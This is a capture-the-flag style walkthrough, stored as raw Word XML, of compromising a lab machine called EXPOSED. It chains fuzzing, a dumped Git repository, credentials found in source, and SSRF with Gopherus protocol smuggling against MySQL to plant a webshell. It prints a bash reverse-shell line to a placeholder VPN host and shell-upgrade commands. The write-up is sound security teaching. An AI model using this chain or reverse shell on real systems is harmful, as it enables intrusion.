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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>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5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4okx3w7jn6mh" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the EXPOSED machine.If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006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.s6la54933um" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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determine which services are running in the background and which ports are open. Therefore,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977900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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59436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 Port 22 - SSH</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">• Port 80 - HTTP</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start by looking at the website running on port 80:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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08300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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authentication attempts using default credentials such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and unsuccessful SQL Injection attempts to bypass authentication, we can adopt a new approach. The next step is to perform a fuzzing process to identify possible directories or relevant files that may expose sensitive information or provide additional access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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0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13000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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As observed in the output of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, there is an exposed Git repository. To exploit this, we can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-dumper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, which allows us to dump the contents of the repository.</w:t>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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/carlosevieira/git-dumper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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14500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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dumping the repository, we can analyze the application’s source code. To make reading easier, it is recommended to open the directory in VS Code. When analyzing the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is possible to identify credentials that allow access to the application.</w:t>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30400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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analyzing the code of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified that it is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1485900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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Knowing this, we can return to the first step, which is logging into the application. </w:t>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logging into the application, it is possible to access the page </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and insert a URL such as</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http://127.0.0.1:22</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1:3306.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this, we can identify which services are active locally, and it is possible to verify that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running in the local environment.</w:t>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187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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Based on this information, it is possible to exploit the vulnerability using a technique known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Smuggling</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allows direct interaction with the local MySQL service. This approach can be used to achieve </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. To facilitate this exploitation, we can use the tool indicated below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/tarunkant/Gopherus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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downloading the tool, we can follow the procedure illustrated to create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This webshell will be written to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/assets</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, which was identified during the fuzzing process as a location with write permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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52600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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01900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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27200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="46"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accessing the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and providing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?0=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the server returns the corresponding output of the executed command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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98600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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can use the code below to obtain a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$shell = "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;vpn-ip&gt;/4444 0&gt;&amp;1'";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo urlencode($shell);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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2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927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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5943600" cy="927100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After passing the payload to the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?0=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we obtain shell access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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4ra34ivivcf9" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>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1079500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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9436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d8z9xy8c2tpt" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell TTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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-echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2F">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977900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44"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9436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accessing the root directory </w:t>
      </w:r>
